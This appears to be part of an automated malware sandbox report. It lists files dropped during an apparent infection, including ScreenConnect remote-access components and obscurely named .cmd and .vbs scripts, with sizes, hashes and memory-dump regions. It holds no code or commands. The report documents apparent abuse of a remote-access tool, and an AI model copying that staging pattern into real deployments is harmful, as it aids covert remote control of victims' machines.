      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.Core.dll

        Filesize

        536KB

        MD5

        14e7489ffebbb5a2ea500f796d881ad9

        SHA1

        0323ee0e1faa4aa0e33fb6c6147290aa71637ebd

        SHA256

        a2e9752de49d18e885cbd61b29905983d44b4bc0379a244bfabdaa3188c01f0a

        SHA512

        2110113240b7d803d8271139e0a2439dbc86ae8719ecd8b132bbda2520f22dc3f169598c8e966ac9c0a40e617219cb8fe8aac674904f6a1ae92d4ac1e20627cd

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.Core.dll.genman

        Filesize

        1KB

        MD5

        293c100b1896e7532d241dac2b32dcb3

        SHA1

        1e14b49c9af799da0371474bf712f3ac3e5b6ebc

        SHA256

        ac3c489c02264ff1918fc0b79083a7754b98542a6cc4e2af67eafdbf76c6232e

        SHA512

        ed3935d90f48043be2bf7a60cacbb47964672eab0c9ebfc2eeac8ebc4341383f32f55901601de56698eef6aec6399e77eb8dec6f5158d1b3761d5f25adfc3499

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.Windows.dll

        Filesize

        1.6MB

        MD5

        9ad3964ba3ad24c42c567e47f88c82b2

        SHA1

        6b4b581fc4e3ecb91b24ec601daa0594106bcc5d

        SHA256

        84a09ed81afc5ff9a17f81763c044c82a2d9e26f852de528112153ee9ab041d0

        SHA512

        ce557a89c0fe6de59046116c1e262a36bbc3d561a91e44dcda022bef72cb75742c8b01bedcc5b9b999e07d8de1f94c665dd85d277e981b27b6bfebeaf9e58097

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.Windows.dll.genman

        Filesize

        1KB

        MD5

        88ecd545bdbe3ed49c6a2b87589102ec

        SHA1

        e72949af66b0a20e50474d2005e320ba63ba9b2b

        SHA256

        d48afb709e61b86eb6eef67b41d0fa7ec780c4536f5cf9aca7a0b440aed98ef0

        SHA512

        7ed19ed32e02348abc8a64ca0a21e05496a6595a8b94d3f960cf3f6a6c6445d30aad7aec09ce76776023f9e5f4b40df032408deffba102026247099879cb95de

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.WindowsBackstageShell.exe

        Filesize

        59KB

        MD5

        afa97caf20f3608799e670e9d6253247

        SHA1

        7e410fde0ca1350aa68ef478e48274888688f8ee

        SHA256

        e25f32ba3fa32fd0ddd99eb65b26835e30829b5e4b58573690aa717e093a5d8f

        SHA512

        fe0b378651783ef4add3851e12291c82edccde1dbd1fa0b76d7a2c2dcd181e013b9361bbdae4dae946c0d45fb4bf6f75dc027f217326893c906e47041e3039b0

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.WindowsClient.exe

        Filesize

        588KB

        MD5

        1778204a8c3bc2b8e5e4194edbaf7135

        SHA1

        0203b65e92d2d1200dd695fe4c334955befbddd3

        SHA256

        600cf10e27311e60d32722654ef184c031a77b5ae1f8abae8891732710afee31

        SHA512

        a902080ff8ee0d9aeffa0b86e7980457a4e3705789529c82679766580df0dc17535d858fbe50731e00549932f6d49011868dee4181c6716c36379ad194b0ed69

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.WindowsClient.exe.config

        Filesize

        266B

        MD5

        728175e20ffbceb46760bb5e1112f38b

        SHA1

        2421add1f3c9c5ed9c80b339881d08ab10b340e3

        SHA256

        87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

        SHA512

        fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.WindowsClient.exe.genman

        Filesize

        2KB

        MD5

        6a1c3ff3e8f5e23698453b4ccda2fd12

        SHA1

        c7eed4383b7f1982222e663a0b8850d09b6b20ef

        SHA256

        8aa9dacc29faef7be40d54b45fba75afc13bf25638d9a46dc4b516529ae74619

        SHA512

        c9f09c968d71f4d7481c1aadbf8337fbce052f71aa168795daf374d53cc827ba9e7f1cf9adc50fc423cf68ee500bfc931dd2e14648626ed7d688f1a41447dccc

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.WindowsClient.exe.manifest

        Filesize

        17KB

        MD5

        7f68a01c2fea1c80a75e287bb36d6b43

        SHA1

        f271ebc2542397e59c3d57d30cc54bf1d9db4f69

        SHA256

        2e0e46f395d5a6440f179b61c4008abf3d72cfcda705a543c8ee18b41d37b025

        SHA512

        c6c1c9d6d9c50f94c9bc8c8a422cd00397ee184b6f6113ea19f9209c0e2339b540ee92d35bcce81f242d6fdc3c720ec2e56675e702e90c91533a07fa9f9db753

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.WindowsFileManager.exe

        Filesize

        79KB

        MD5

        1aee526dc110e24d1399affccd452ab3

        SHA1

        04db0e8772933bc57364615d0d104dc2550bd064

        SHA256

        ebd04a4540d6e76776bd58deea627345d0f8fba2c04cc65be5e979a8a67a62a1

        SHA512

        482a8ee35d53be907be39dbd6c46d1f45656046baca95630d1f07ac90a66f0e61d41f940fb166677ac4d5a48cf66c28e76d89912aed3d673a80737732e863851

      • C:\Users\Admin\AppData\Local\Temp\Deployment\8T1H5NAM.77A\E7NZR975.X3N.application

        Filesize

        114KB

        MD5

        fe06c5e9c53ab451368667d3e3b1504b

        SHA1

        7c76334bb2bc0d1e444a1fcaa484b642572cad1e

        SHA256

        89eb055f32184dfe333494a271ed865958d5adc1521043c6d81098f541cc0b3f

        SHA512

        b0c6570f937582b1072491506992ad077bd271b7301c26624a9418baf77bbe5496d30ef3522d63d60ef8beecc2ca113788b4a91833b99d931c841bac0d051caa

      • C:\Users\Admin\AppData\Local\Temp\Galgebakkernes.cmd

        Filesize

        300B

        MD5

        9fdce3818bba9955b29c71cb6cc3c216

        SHA1

        a18dce476687b37545362c190714e07ada342cfe

        SHA256

        56276abc3b62defd1872dbf4e5406bd20bc7cfa6738b75d8e6b47df0bbe62aaa

        SHA512

        a201c417b8d1c8035abead1363b8f789ab619d98846aa8d3f2e18c55ae697a15c736e3f580774cd9a97418425fa13a1668056d3ca23b3d8208252b12b6b64910

      • C:\Users\Admin\AppData\Roaming\Landbrugslovenes201.spr

        Filesize

        431KB

        MD5

        4c6b874ffef9b28f76e18c8d297b3e86

        SHA1

        9f6346f7c9e8e5a0bd107f287ca8754672d2b8c8

        SHA256

        17ae0bc1285d147b31e8eba720c1d7a782aa58d27db15f419f06f9912d80774f

        SHA512

        1f751a0428c24214e26943c3a1122a7983933f20e58f6a917437525638855de4c97229605b9a569f84d59f53efda7c854f9a154ed86e5d8133b8fa1df7e57548

      • C:\Users\Admin\Documents\ConnectWiseControl\Temp\Caproyl.vbs

        Filesize

        66KB

        MD5

        0f647f45721ac8ee963efda256341a93

        SHA1

        50a7b847705e789a24a852cff12c6849540e1bed

        SHA256

        42cdd0ce8e1b5273569fb1295e6ce7db8deb5c26cf41fbe4302dc6e19c33abbc

        SHA512

        ac15c8091842aebdde687482bc11a0eb2967ac2fb978db462f34f1852ba77639e578973f59707c0aa6860b01825656a8fac19ffed4d7b31b9fce67ec03ce7049

      • C:\Windows\SystemTemp\ScreenConnect\24.3.7.9067\hVqvsfdxfEibrun.cmd

        Filesize

        6KB

        MD5

        d469405c0e5ded0fde4f0014a67e71fe

        SHA1

        ecebc8dffe6ee3ba59c90131e776ce015bb51fd8

        SHA256

        65e0a54b9303337d7a105895319044e50abd8bc873965b1431b19def14f036f8

        SHA512

        6265dc322608a796565539218f8d669be793252546d8c982d9f41f6d838b0734db356f9a5a1457946e00589e2d06ab59c7bbe03c0740615dc907f3b2c4f0d3cb

      • C:\Windows\Temp\__PSScriptPolicyTest_lh3wiw3m.ddh.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/512-392-0x0000000004760000-0x0000000004D04000-memory.dmp

        Filesize

        5.6MB

      • memory/512-393-0x0000000003F50000-0x0000000003FA0000-memory.dmp

        Filesize

        320KB

      • memory/512-396-0x0000000003FA0000-0x0000000003FD6000-memory.dmp

        Filesize

        216KB

      • memory/512-397-0x0000000004250000-0x00000000042E2000-memory.dmp

        Filesize

        584KB

      • memory/512-390-0x0000000004000000-0x00000000041AA000-memory.dmp

        Filesize

        1.7MB

      • memory/704-404-0x00000000015F0000-0x0000000001608000-memory.dmp

        Filesize

        96KB

      • memory/1660-436-0x0000021C605B0000-0x0000021C606B2000-memory.dmp

        Filesize

        1.0MB

      • memory/1660-423-0x0000021C60380000-0x0000021C603A2000-memory.dmp

        Filesize

        136KB

      • memory/1984-490-0x0000000008710000-0x00000000095E3000-memory.dmp

        Filesize

        14.8MB

      • memory/2704-475-0x0000020379850000-0x0000020379952000-memory.dmp

        Filesize

        1.0MB

      • memory/3288-427-0x000002495D7A0000-0x000002495D8A2000-memory.dmp

        Filesize

        1.0MB

      • memory/3288-408-0x00007FFEF09F3000-0x00007FFEF09F5000-memory.dmp

        Filesize

        8KB

      • memory/3288-37-0x0000024960C60000-0x0000024960E0A000-memory.dmp

        Filesize

        1.7MB

      • memory/3288-0-0x00007FFEF09F3000-0x00007FFEF09F5000-memory.dmp

        Filesize

        8KB

      • memory/3288-426-0x000002495D610000-0x000002495D798000-memory.dmp

        Filesize

        1.5MB

      • memory/3288-43-0x00000249609A0000-0x0000024960A36000-memory.dmp

        Filesize

        600KB

      • memory/3288-428-0x00007FFEF09F0000-0x00007FFEF14B1000-memory.dmp

        Filesize

        10.8MB

      • memory/3288-1-0x0000024942C20000-0x0000024942C28000-memory.dmp

        Filesize

        32KB

      • memory/3288-2-0x000002495D1F0000-0x000002495D376000-memory.dmp

        Filesize

        1.5MB

      • memory/3288-3-0x00007FFEF09F0000-0x00007FFEF14B1000-memory.dmp

        Filesize

        10.8MB

      • memory/3288-4-0x00007FFEF09F0000-0x00007FFEF14B1000-memory.dmp

        Filesize

        10.8MB

      • memory/3288-7-0x000002495D4C0000-0x000002495D510000-memory.dmp

        Filesize

        320KB

      • memory/3288-27-0x00007FFEF09F0000-0x00007FFEF14B1000-memory.dmp

        Filesize

        10.8MB

      • memory/3288-61-0x0000024960990000-0x0000024960A1C000-memory.dmp

        Filesize

        560KB

      • memory/3288-55-0x000002495D8D0000-0x000002495D8E8000-memory.dmp

        Filesize

        96KB

      • memory/3288-49-0x0000024960800000-0x0000024960836000-memory.dmp

        Filesize

        216KB

      • memory/3356-345-0x0000000000EB0000-0x0000000000F46000-memory.dmp

        Filesize

        600KB

      • memory/3712-506-0x0000000001080000-0x0000000001096000-memory.dmp

        Filesize

        88KB

      • memory/3712-539-0x00000000224F0000-0x00000000224FA000-memory.dmp

        Filesize

        40KB

      • memory/3712-538-0x0000000022350000-0x000000002236E000-memory.dmp

        Filesize

        120KB

      • memory/3712-537-0x0000000022170000-0x00000000221DC000-memory.dmp

        Filesize

        432KB

      • memory/3712-536-0x00000000222D0000-0x0000000022346000-memory.dmp

        Filesize

        472KB

      • memory/3712-530-0x00000000221F0000-0x00000000222D0000-memory.dmp

        Filesize

        896KB

      • memory/3712-510-0x0000000021DD0000-0x0000000021E6C000-memory.dmp

        Filesize

        624KB

      • memory/3712-509-0x0000000021290000-0x000000002129A000-memory.dmp

        Filesize

        40KB

      • memory/3712-505-0x0000000001080000-0x00000000022D4000-memory.dmp

        Filesize

        18.3MB

      • memory/4232-378-0x0000000005810000-0x000000000589C000-memory.dmp

        Filesize

        560KB

      • memory/4232-373-0x0000000005720000-0x0000000005738000-memory.dmp

        Filesize

        96KB

      • memory/4364-438-0x0000000005300000-0x0000000005928000-memory.dmp

        Filesize

        6.2MB

      • memory/4364-455-0x0000000006780000-0x000000000679A000-memory.dmp

        Filesize

        104KB

      • memory/4364-441-0x0000000005AE0000-0x0000000005B46000-memory.dmp

        Filesize

        408KB

      • memory/4364-439-0x0000000005A40000-0x0000000005A62000-memory.dmp

        Filesize

        136KB

      • memory/4364-446-0x0000000005B50000-0x0000000005BB6000-memory.dmp

        Filesize

        408KB

      • memory/4364-451-0x0000000005BD0000-0x0000000005F24000-memory.dmp

        Filesize

        3.3MB

      • memory/4364-437-0x0000000004C40000-0x0000000004C76000-memory.dmp

        Filesize

        216KB

      • memory/4364-487-0x0000000008BF0000-0x000000000970C000-memory.dmp

        Filesize

        11.1MB

      • memory/4364-456-0x0000000007490000-0x0000000007526000-memory.dmp

        Filesize

        600KB

      • memory/4364-453-0x0000000006220000-0x000000000626C000-memory.dmp

        Filesize

        304KB

      • memory/4364-454-0x0000000007A10000-0x000000000808A000-memory.dmp

        Filesize

        6.5MB

      • memory/4364-452-0x00000000061D0000-0x00000000061EE000-memory.dmp

        Filesize

        120KB

      • memory/4364-457-0x0000000007420000-0x0000000007442000-memory.dmp

        Filesize

        136KB

      • memory/4700-522-0x0000000000A00000-0x0000000001C54000-memory.dmp

        Filesize

        18.3MB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.